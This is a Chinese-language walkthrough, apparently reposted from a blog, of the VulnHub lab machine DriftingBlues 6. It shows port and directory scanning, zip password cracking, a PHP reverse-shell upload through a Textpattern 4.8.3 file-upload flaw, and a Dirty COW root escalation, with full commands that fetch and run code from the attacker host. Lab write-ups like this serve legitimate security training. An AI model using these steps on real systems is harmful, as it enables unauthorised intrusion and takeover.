广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >vulnhub DriftingBlues: 6
  • 473
分享到

vulnhub DriftingBlues: 6

phpreverseshell文件上传脏牛RCE 2023-09-06 08:09:47 473人浏览 独家记忆
摘要

渗透思路: nmap扫描端口 ---- Gobuster扫描网站目录 ---- fcrackzip爆破压缩包密码 ---- 利用TextPattern CMS 4.8.3的RCE(/任意文件上传)漏洞getshell ---- 脏牛提权 环

渗透思路:

nmap扫描端口 ---- Gobuster扫描网站目录 ---- fcrackzip爆破压缩包密码 ---- 利用TextPattern CMS 4.8.3的RCE(/任意文件上传)漏洞getshell ---- 脏牛提权

环境信息:

靶机:192.168.101.100

攻击机:192.168.101.34

具体步骤:

1、nmap扫描端口

sudo nmap -sV -sC -p- 192.168.101.100

扫描到80端口,并且发现了robots.txt文件

2、gobuster扫描网站目录

浏览器访问Http://192.168.101.100/robots.txt

除了发现http://192.168.101.100/textpattern/textpattern/这个登录页面

还发现一句提示

dont forget to add .zip extension to your dir-brute

因此接下来用gobuster扫描网站目录,并加上-x .zip,来扫描.zip后缀的网站文件

gobuster dir -u http://192.168.101.100 -w /usr/share/Wordlists/dirbuster/directory-list-2.3-medium.txt -x .zip

扫描到spammer.zip

3、fcrackzip爆破压缩包密码

下载http://192.168.101.100/spammer.zip,解压的时候发现需要密码

用fcrackzip爆破密码

fcrackzip -D -p rockyou.txt spammer.zip -u

得到密码myspace4

解压spammer.zip,密码输入myspace4,得到creds.txt

unzip spammer.zip

查看creds.txt,里面有http://192.168.101.100/textpattern/textpattern/的用户名和密码mayer:lionheart

4、利用TextPattern CMS 4.8.3的RCE(/任意文件上传)漏洞getshell

以用户名mayer,密码lionheart登录http://192.168.101.100/textpattern/textpattern/

登录成功后在左下角发现站点是基于Textpattern CMS v4.8.3搭建的

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers中搜索Textpattern CMS,发现一个4.8.3版本的RCE:

TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated) - PHP webapps Exploit

把这个exp下载下来之后执行,发现无法执行成功,报错

后来又试了几个exp,都执行失败,寻思可能和这个站点总是出现告警提示有关

最后,根据exploit-db上的exp看出这是个任意文件上传造成的rce,并且文件上传的页面地址是http://192.168.101.100/textpattern/textpattern/index.PHP?event=file

在该处上传kali上的/usr/share/WEBshells/php/php-reverse-shell.php,上传前需要修改$ip和$port分别为攻击机ip和攻击机监听的tcp端口。

上传完成后,访问该文件的url为http://192.168.101.100/textpattern/files/上传的文件名

(这边看exp原本我以为url是http://192.168.101.100/textpattern/textpattern/files/上传的文件名,但这个不行,后来试出来是http://192.168.101.100/textpattern/files/上传的文件名)

在攻击机上nc监听8888端口,浏览器访问上传的文件后即可获得靶机www-data用户的反弹shell。

nc -nlvp 8888

再输入如下命令即可得到交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

5、脏牛提权

从攻击机上获取linpeas.sh并执行(攻击机上先执行Python2 -m Simplehttpserver 80以开启http服务)

wget http://192.168.101.34/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

找到内核提权的方法dirty cow,exp下载路径为https://www.exploit-db.com/download/40847

靶机/tmp目录下执行

wget http://192.168.101.34/40847.cpp && g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil && chmod +x dcow && ./dcow

执行成功,获得root用户密码dirtyCowFun

执行su -密码为dirtyCowFun,提权到root,并在/root下找到flag.txt

来源地址:https://blog.csdn.net/elephantxiang/article/details/126682918

--结束END--

本文标题: vulnhub DriftingBlues: 6

本文链接: https://www.lsjlt.com/news/396791.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • vulnhub DriftingBlues: 6
    渗透思路: nmap扫描端口 ---- gobuster扫描网站目录 ---- fcrackzip爆破压缩包密码 ---- 利用TextPattern CMS 4.8.3的RCE(/任意文件上传)漏洞getshell ---- 脏牛提权 环...
    99+
    2023-09-06
    php reverse shell 文件上传 脏牛 RCE
  • 靶机渗透练习Vulnhub DriftingBlues-6
    攻击机ip 192.168.159.88 扫描主机 arp-scan -I eth0 -l  得到靶机ip: 192.168.159.144 扫描端口 nmap -sS -A -sV -T4 -p- 192.168.159.144 ...
    99+
    2023-09-10
    php 安全 网络 web安全
  • Vulnhub metasploitable-1
    总结:tomcat后台getshll,脏牛提权,秘钥对对比ssh免密登录,samba cve-2007-2447,tikiwiki1.9.5,distccd后门CVE-2004-2687,cve-2009-1185提权 目录 下载地址...
    99+
    2023-10-12
    安全 经验分享 php linux web安全
  • vulnhub靶机sar
    准备工作 下载连接:https://download.vulnhub.com/sar/sar.zip 下载完后解压,然后双击打开,VMware导入OVA 网络环境:DHCP、NAT 信息收集 主机发现 先扫描整个C段 192.168.10...
    99+
    2023-09-08
    php 安全 网络安全
  • 【VulnHub靶场】Hackable: III
    Step 1 在找到目标靶机后,我们首先使用nmap工具来进行初步的信息收集 Command used: > Step 2 通过扫描我们可以得知80端口是开启状态,访问后得到以下界面 查看其源代码...
    99+
    2023-08-31
    安全 php 系统安全 web安全 网络安全
  • 【VulnHub靶场】——MONEYBOX: 1
    作者名:Demo不是emo  主页面链接:主页传送门创作初心:对于计算机的学习者来说,初期的学习无疑是最迷茫和难以坚持的,中后期主要是经验和能力的提高,我也刚接触计算机1年,也在不断的探索,在CSDN写博客主要是为了分享自己的学习历程...
    99+
    2023-09-08
    服务器 网络安全 web安全 安全
  • 【Vulnhub】之matrix-breakout-2-morpheus
    一、 部署方法 在官网上下载靶机ova环境:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova使用V...
    99+
    2023-09-04
    网络安全 安全性测试 安全
  • vulnhub靶场之Black-Widow-final
    1.信息收集 探测存活主机,发现192.168.239.177存活 对目标主机192.168.239.177进行端口扫描,发现存活22、80、111、2049、3128等端口 在浏览器中访问htt...
    99+
    2023-09-08
    php apache 安全
  • vulnhub靶场Matrix-Breakout 2 Morpheus教程
    靶场搭建 靶机下载地址:Matrix-Breakout: 2 Morpheus ~ VulnHub 直接解压双击ova文件即可 使用软件:VMware(可能会出现问题),VirtualBox(此处官方建议使用VirtualBox)...
    99+
    2023-10-28
    网络安全 安全 系统安全 web安全 Powered by 金山文档
  • VulnHub-DarkHole_1靶机详细渗透教程
    1.靶机部署 kali安装:https://blog.csdn.net/l2872253606/article/details/123592717spm=1001.2014.3001.5502 靶机下...
    99+
    2023-08-31
    linux
  • 6. 锁
    开发多用户、数据库驱动的应用时,最大的难点是:一方面要最大程度的利用数据库的并发访问,一方面还要确保每个用户能以一致的方式读取和修改数据,为此有了锁的机制。 6.1 什么是锁 锁机制用于管理对共享资源的并发访问。InnoDB除了会...
    99+
    2020-05-07
    6.
  • VMware workstation 6
    近两日,闲着无聊。玩了下VMWARE VI3。X61本子一台,T7500 4G内存windows 2003  系统上安装有VMware Workstation 6.5然后通过设置,在Vmware 6.5上安装ESX 3.5 U3安装指导文档...
    99+
    2023-01-31
    VMware workstation
  • 怎么用PHP输出6*6乘法表
    本篇内容介绍了“怎么用PHP输出6*6乘法表”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!本文的中心问题是“如何编写一个 PHP 程序,打印...
    99+
    2023-06-20
  • Spark SQL(6) OptimizedPlan
    Spark SQL(6) OptimizedPlan 在这一步spark sql主要应用一些规则,优化生成的Resolved Plan,这一步涉及到的有Optimizer。 之前介绍在sparksession实例化的是会实例化session...
    99+
    2018-05-05
    Spark SQL(6) OptimizedPlan 数据库入门 数据库基础教程 数据库 mysql
  • python基础6
                    *******************            *  异常处理与调式         *            **********************常见错误:***1) 名字没有定义,N...
    99+
    2023-01-31
    基础 python
  • Python-练习6
     练习1:创建一个小游戏:      1). 游戏人物:    People           张琴成,男, 18岁,初始战斗值1000;           胡丽婷,女, 18岁, 初始战斗值2000;           安晋川,男,...
    99+
    2023-01-31
    Python
  • Earn RS3gold 3500M 6
    The developed blog gives us some tips to train Warding. Which is very excited that OSRS Warding trainning can be easy to...
    99+
    2023-01-31
    Earn RS3gold
  • FastAPI--中间件(6)
    所谓的中间件,其实和我们bottle中的中间件作用是一致。有些方法或操作需要在所有路由之前执行,比如要加一个http访问的拦截器,可以对部分接口API需要授权才能访问的接口进行验证之类的。FastAPI提供了一个@app.middlewar...
    99+
    2023-01-31
    中间件 FastAPI
  • centOS 6 安装mongoDB
    mongoDB安装与配置第一步,去mongoDB官网下载mongoDB数据库下载版本要根据你的操作系统来下,mongoDB如:mongodb-linux-x86_64-3.2.10.tgz第二步,安装虚拟机...
    99+
    2022-10-18
  • CentOS 6 squid 3.x
    CentOS 6 编译squid 3.x   yum -y install gcc make patch gcc-c++ gcc-g77 flex bison autoconf automake gpg --keyserver subkey...
    99+
    2023-01-31
    CentOS squid
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作